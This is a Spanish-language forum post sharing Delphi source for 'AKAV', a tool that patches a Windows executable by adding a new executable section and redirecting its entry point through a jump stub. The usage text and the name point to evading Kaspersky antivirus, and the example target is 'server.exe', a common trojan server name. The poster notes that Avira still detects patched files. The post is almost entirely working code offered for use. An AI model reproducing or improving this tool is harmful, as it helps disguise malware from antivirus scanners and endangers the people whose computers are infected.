(delphi) AKAV
Publicado: 23 Dic 2008, 00:26
autor: ErazerZ
PD: el AVIRA detecta cualquier archivo parcheado con este metodo
Código: Seleccionar todo
program AKAV;
{$APPTYPE CONSOLE}
uses
Windows;
function AddSection(FileName: String; SectionName: String): Boolean;
const
SectionCode: Array[0..6] of Byte = (
$B8, $00, $00, $00, $00, // MOV EAX, $00000000
$FF, $E0); // JMP EAX
var
i: ShortInt;
hFile: THandle;
DosHeader: TImageDosHeader;
NtHeaders: TImageNtHeaders;
SectionHeader, NewSection: TImageSectionHeader;
dwOldEntryPoint, dwReadBytes, dwWrittenBytes: DWORD;
begin
Result := False;
// Read DOS Header
hFile := CreateFile(PChar(FileName), GENERIC_ALL, FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING, 0, 0);
if hFile = 0 then
begin
CloseHandle(hFile);
Exit;
end;
SetFilePointer(hFile, 0, nil, FILE_BEGIN);
ReadFile(hFile, DosHeader, sizeof(DosHeader), dwReadBytes, nil);
if dwReadBytes = sizeof(DosHeader) then
begin
// Read Nt Header
SetFilePointer(hFile, DosHeader._lfanew, nil, FILE_BEGIN);
ReadFile(hFile, NtHeaders, sizeof(NtHeaders), dwReadBytes, nil);
if dwReadBytes = sizeof(NtHeaders) then
begin
// Read Section Header
SetFilePointer(hFile, sizeof(SectionHeader) * (NtHeaders.FileHeader.NumberOfSections -1), nil, FILE_CURRENT);
ReadFile(hFile, SectionHeader, sizeof(SectionHeader), dwReadBytes, nil);
if dwReadBytes = sizeof(SectionHeader) then
begin
// New Section
if SectionName = '' then
SectionName := '.EDI';
// Section Name
for i := 0 to 7 do
NewSection.Name[i] := Byte(SectionName[i +1]);
// The options of the Section
NewSection.VirtualAddress := NtHeaders.OptionalHeader.SizeOfImage;
NewSection.Misc.VirtualSize := $200;
NewSection.SizeOfRawData := (NewSection.VirtualAddress div NtHeaders.OptionalHeader.FileAlignment +1) *
NtHeaders.OptionalHeader.FileAlignment - NtHeaders.OptionalHeader.SizeOfImage;
NewSection.PointerToRawData := SectionHeader.SizeOfRawData + SectionHeader.PointerToRawData;
NewSection.Characteristics := $E0000020;
Inc(NtHeaders.FileHeader.NumberOfSections);
// Write new Section
WriteFile(hFile, NewSection, sizeof(NewSection), dwWrittenBytes, nil);
if dwWrittenBytes = sizeof(NewSection) then
begin
// New Entrypoint
dwOldEntryPoint := NtHeaders.OptionalHeader.AddressOfEntryPoint + NtHeaders.OptionalHeader.ImageBase;
NtHeaders.OptionalHeader.AddressOfEntryPoint := NewSection.VirtualAddress;
// change the SectionCode "EntryPoint"
PDWORD(DWORD(@SectionCode) +1)^ := dwOldEntryPoint;
// write the new sizeofimage
NtHeaders.OptionalHeader.SizeOfImage := NtHeaders.OptionalHeader.SizeOfImage + NewSection.Misc.VirtualSize;
SetFilePointer(hFile, DosHeader._lfanew, nil, FILE_BEGIN);
WriteFile(hFile, NtHeaders, sizeof(NtHeaders), dwWrittenBytes, nil);
if dwWrittenBytes = sizeof(NtHeaders) then
begin
// write the new section
SetFilePointer(hFile, GetFileSize(hFile, nil), nil, FILE_BEGIN);
WriteFile(hFile, SectionCode, NewSection.Misc.VirtualSize, dwWrittenBytes, nil);
if dwWrittenBytes = NewSection.Misc.VirtualSize then
begin
CloseHandle(hFile);
Result := True;
end else
CloseHandle(hFile);
end else
CloseHandle(hFile);
end else
CloseHandle(hFile);
end else
CloseHandle(hFile);
end else
CloseHandle(hFile);
end else
CloseHandle(hFile);
end;
begin
WriteLn;
WriteLn('A[nti]KAV by ErazerZ');
WriteLn('5th January 2006');
WriteLn('Web: http://www.gateofgod.com');
WriteLn('E-Mail: [email protected]');
WriteLn;
if (ParamStr(1) <> '') then
begin
if AddSection(ParamStr(1), ParamStr(2)) then
WriteLn('File is patched!')
else
WriteLn('Error while patching!');
end else
begin
WriteLn('Usage:' +#9#9+ 'AKAV.exe <your Application''s path> <your Section Name>');
WriteLn('Example:' +#9+ 'AKAV.exe "c:\server.exe" ".ErazerZ"');
end;
end.